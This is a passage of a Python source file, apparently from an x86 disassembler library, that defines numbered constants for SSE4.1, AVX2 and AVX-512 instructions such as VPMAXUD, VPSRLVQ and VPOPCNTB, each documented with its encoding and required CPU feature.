``VPMAXSQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3D /r``
``AVX512F``
``16/32/64-bit``
"""
PMAXUW_XMM_XMMM128: int = 2987
"""
``PMAXUW xmm1, xmm2/m128``
``66 0F 38 3E /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXUW_XMM_XMM_XMMM128: int = 2988
"""
``VPMAXUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUW_YMM_YMM_YMMM256: int = 2989
"""
``VPMAXUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUW_XMM_K1Z_XMM_XMMM128: int = 2990
"""
``VPMAXUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3E /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUW_YMM_K1Z_YMM_YMMM256: int = 2991
"""
``VPMAXUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3E /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUW_ZMM_K1Z_ZMM_ZMMM512: int = 2992
"""
``VPMAXUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3E /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXUD_XMM_XMMM128: int = 2993
"""
``PMAXUD xmm1, xmm2/m128``
``66 0F 38 3F /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXUD_XMM_XMM_XMMM128: int = 2994
"""
``VPMAXUD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUD_YMM_YMM_YMMM256: int = 2995
"""
``VPMAXUD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3F /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUD_XMM_K1Z_XMM_XMMM128B32: int = 2996
"""
``VPMAXUD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUD_YMM_K1Z_YMM_YMMM256B32: int = 2997
"""
``VPMAXUD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2998
"""
``VPMAXUD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_XMM_K1Z_XMM_XMMM128B64: int = 2999
"""
``VPMAXUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_YMM_K1Z_YMM_YMMM256B64: int = 3000
"""
``VPMAXUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3001
"""
``VPMAXUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3F /r``
``AVX512F``
``16/32/64-bit``
"""
PMULLD_XMM_XMMM128: int = 3002
"""
``PMULLD xmm1, xmm2/m128``
``66 0F 38 40 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMULLD_XMM_XMM_XMMM128: int = 3003
"""
``VPMULLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 40 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULLD_YMM_YMM_YMMM256: int = 3004
"""
``VPMULLD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 40 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULLD_XMM_K1Z_XMM_XMMM128B32: int = 3005
"""
``VPMULLD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 40 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLD_YMM_K1Z_YMM_YMMM256B32: int = 3006
"""
``VPMULLD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 40 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3007
"""
``VPMULLD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 40 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLQ_XMM_K1Z_XMM_XMMM128B64: int = 3008
"""
``VPMULLQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 40 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMULLQ_YMM_K1Z_YMM_YMMM256B64: int = 3009
"""
``VPMULLQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 40 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMULLQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3010
"""
``VPMULLQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 40 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PHMINPOSUW_XMM_XMMM128: int = 3011
"""
``PHMINPOSUW xmm1, xmm2/m128``
``66 0F 38 41 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPHMINPOSUW_XMM_XMMM128: int = 3012
"""
``VPHMINPOSUW xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 41 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_XMM_K1Z_XMMM128B32: int = 3013
"""
``VGETEXPPS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_YMM_K1Z_YMMM256B32: int = 3014
"""
``VGETEXPPS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_ZMM_K1Z_ZMMM512B32_SAE: int = 3015
"""
``VGETEXPPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 42 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_XMM_K1Z_XMMM128B64: int = 3016
"""
``VGETEXPPD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_YMM_K1Z_YMMM256B64: int = 3017
"""
``VGETEXPPD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_ZMM_K1Z_ZMMM512B64_SAE: int = 3018
"""
``VGETEXPPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 42 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPSS_XMM_K1Z_XMM_XMMM32_SAE: int = 3019
"""
``VGETEXPSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 43 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPSD_XMM_K1Z_XMM_XMMM64_SAE: int = 3020
"""
``VGETEXPSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 43 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_XMM_K1Z_XMMM128B32: int = 3021
"""
``VPLZCNTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_YMM_K1Z_YMMM256B32: int = 3022
"""
``VPLZCNTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_ZMM_K1Z_ZMMM512B32: int = 3023
"""
``VPLZCNTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 44 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_XMM_K1Z_XMMM128B64: int = 3024
"""
``VPLZCNTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_YMM_K1Z_YMMM256B64: int = 3025
"""
``VPLZCNTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_ZMM_K1Z_ZMMM512B64: int = 3026
"""
``VPLZCNTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 44 /r``
``AVX512CD``
``16/32/64-bit``
"""
VEX_VPSRLVD_XMM_XMM_XMMM128: int = 3027
"""
``VPSRLVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVD_YMM_YMM_YMMM256: int = 3028
"""
``VPSRLVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVQ_XMM_XMM_XMMM128: int = 3029
"""
``VPSRLVQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVQ_YMM_YMM_YMMM256: int = 3030
"""
``VPSRLVQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 45 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLVD_XMM_K1Z_XMM_XMMM128B32: int = 3031
"""
``VPSRLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVD_YMM_K1Z_YMM_YMMM256B32: int = 3032
"""
``VPSRLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3033
"""
``VPSRLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 45 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3034
"""
``VPSRLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3035
"""
``VPSRLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3036
"""
``VPSRLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 45 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPSRAVD_XMM_XMM_XMMM128: int = 3037
"""
``VPSRAVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 46 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRAVD_YMM_YMM_YMMM256: int = 3038
"""
``VPSRAVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 46 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAVD_XMM_K1Z_XMM_XMMM128B32: int = 3039
"""
``VPSRAVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVD_YMM_K1Z_YMM_YMMM256B32: int = 3040
"""
``VPSRAVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3041
"""
``VPSRAVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 46 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_XMM_K1Z_XMM_XMMM128B64: int = 3042
"""
``VPSRAVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_YMM_K1Z_YMM_YMMM256B64: int = 3043
"""
``VPSRAVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3044
"""
``VPSRAVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 46 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPSLLVD_XMM_XMM_XMMM128: int = 3045
"""
``VPSLLVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVD_YMM_YMM_YMMM256: int = 3046
"""
``VPSLLVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVQ_XMM_XMM_XMMM128: int = 3047
"""
``VPSLLVQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVQ_YMM_YMM_YMMM256: int = 3048
"""
``VPSLLVQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 47 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLVD_XMM_K1Z_XMM_XMMM128B32: int = 3049
"""
``VPSLLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVD_YMM_K1Z_YMM_YMMM256B32: int = 3050
"""
``VPSLLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3051
"""
``VPSLLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 47 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3052
"""
``VPSLLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3053
"""
``VPSLLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3054
"""
``VPSLLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 47 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_XMM_K1Z_XMMM128B32: int = 3055
"""
``VRCP14PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_YMM_K1Z_YMMM256B32: int = 3056
"""
``VRCP14PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_ZMM_K1Z_ZMMM512B32: int = 3057
"""
``VRCP14PS zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 4C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_XMM_K1Z_XMMM128B64: int = 3058
"""
``VRCP14PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_YMM_K1Z_YMMM256B64: int = 3059
"""
``VRCP14PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_ZMM_K1Z_ZMMM512B64: int = 3060
"""
``VRCP14PD zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 4C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14SS_XMM_K1Z_XMM_XMMM32: int = 3061
"""
``VRCP14SS xmm1 {k1}{z}, xmm2, xmm3/m32``
``EVEX.LIG.66.0F38.W0 4D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14SD_XMM_K1Z_XMM_XMMM64: int = 3062
"""
``VRCP14SD xmm1 {k1}{z}, xmm2, xmm3/m64``
``EVEX.LIG.66.0F38.W1 4D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_XMM_K1Z_XMMM128B32: int = 3063
"""
``VRSQRT14PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_YMM_K1Z_YMMM256B32: int = 3064
"""
``VRSQRT14PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_ZMM_K1Z_ZMMM512B32: int = 3065
"""
``VRSQRT14PS zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 4E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_XMM_K1Z_XMMM128B64: int = 3066
"""
``VRSQRT14PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_YMM_K1Z_YMMM256B64: int = 3067
"""
``VRSQRT14PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_ZMM_K1Z_ZMMM512B64: int = 3068
"""
``VRSQRT14PD zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 4E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14SS_XMM_K1Z_XMM_XMMM32: int = 3069
"""
``VRSQRT14SS xmm1 {k1}{z}, xmm2, xmm3/m32``
``EVEX.LIG.66.0F38.W0 4F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14SD_XMM_K1Z_XMM_XMMM64: int = 3070
"""
``VRSQRT14SD xmm1 {k1}{z}, xmm2, xmm3/m64``
``EVEX.LIG.66.0F38.W1 4F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_XMM_K1Z_XMM_XMMM128B32: int = 3071
"""
``VPDPBUSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 50 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_YMM_K1Z_YMM_YMMM256B32: int = 3072
"""
``VPDPBUSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 50 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3073
"""
``VPDPBUSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 50 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_XMM_K1Z_XMM_XMMM128B32: int = 3074
"""
``VPDPBUSDS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 51 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_YMM_K1Z_YMM_YMMM256B32: int = 3075
"""
``VPDPBUSDS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 51 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3076
"""
``VPDPBUSDS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 51 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_XMM_K1Z_XMM_XMMM128B32: int = 3077
"""
``VPDPWSSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 52 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_YMM_K1Z_YMM_YMMM256B32: int = 3078
"""
``VPDPWSSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 52 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3079
"""
``VPDPWSSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 52 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_XMM_K1Z_XMM_XMMM128B32: int = 3080
"""
``VDPBF16PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.0F38.W0 52 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_YMM_K1Z_YMM_YMMM256B32: int = 3081
"""
``VDPBF16PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.0F38.W0 52 /r``
``AVX512VL and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VDPBF16PS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3082
"""
``VDPBF16PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F3.0F38.W0 52 /r``
``AVX512F and AVX512_BF16``
``16/32/64-bit``
"""
EVEX_VP4DPWSSD_ZMM_K1Z_ZMMP3_M128: int = 3083
"""
``VP4DPWSSD zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 52 /r``
``AVX512_4VNNIW``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_XMM_K1Z_XMM_XMMM128B32: int = 3084
"""
``VPDPWSSDS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 53 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_YMM_K1Z_YMM_YMMM256B32: int = 3085
"""
``VPDPWSSDS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 53 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPWSSDS_ZMM_K1Z_ZMM_ZMMM512B32: int = 3086
"""
``VPDPWSSDS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 53 /r``
``AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VP4DPWSSDS_ZMM_K1Z_ZMMP3_M128: int = 3087
"""
``VP4DPWSSDS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 53 /r``
``AVX512_4VNNIW``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_XMM_K1Z_XMMM128: int = 3088
"""
``VPOPCNTB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W0 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_YMM_K1Z_YMMM256: int = 3089
"""
``VPOPCNTB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W0 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTB_ZMM_K1Z_ZMMM512: int = 3090
"""
``VPOPCNTB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W0 54 /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_XMM_K1Z_XMMM128: int = 3091
"""
``VPOPCNTW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.W1 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_YMM_K1Z_YMMM256: int = 3092
"""
``VPOPCNTW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.W1 54 /r``
``AVX512VL and AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTW_ZMM_K1Z_ZMMM512: int = 3093
"""
``VPOPCNTW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.W1 54 /r``
``AVX512_BITALG``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_XMM_K1Z_XMMM128B32: int = 3094
"""
``VPOPCNTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_YMM_K1Z_YMMM256B32: int = 3095
"""
``VPOPCNTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTD_ZMM_K1Z_ZMMM512B32: int = 3096
"""
``VPOPCNTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 55 /r``
``AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_XMM_K1Z_XMMM128B64: int = 3097
"""
``VPOPCNTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_YMM_K1Z_YMMM256B64: int = 3098
"""
``VPOPCNTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 55 /r``
``AVX512VL and AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
EVEX_VPOPCNTQ_ZMM_K1Z_ZMMM512B64: int = 3099
"""
``VPOPCNTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 55 /r``
``AVX512_VPOPCNTDQ``
``16/32/64-bit``
"""
VEX_VPBROADCASTD_XMM_XMMM32: int = 3100
"""
``VPBROADCASTD xmm1, xmm2/m32``
``VEX.128.66.0F38.W0 58 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBROADCASTD_YMM_XMMM32: int = 3101
"""
``VPBROADCASTD ymm1, xmm2/m32``
``VEX.256.66.0F38.W0 58 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_XMM_K1Z_XMMM32: int = 3102
"""
``VPBROADCASTD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_YMM_K1Z_XMMM32: int = 3103
"""
``VPBROADCASTD ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTD_ZMM_K1Z_XMMM32: int = 3104
"""
``VPBROADCASTD zmm1 {k1}{z}, xmm2/m32``
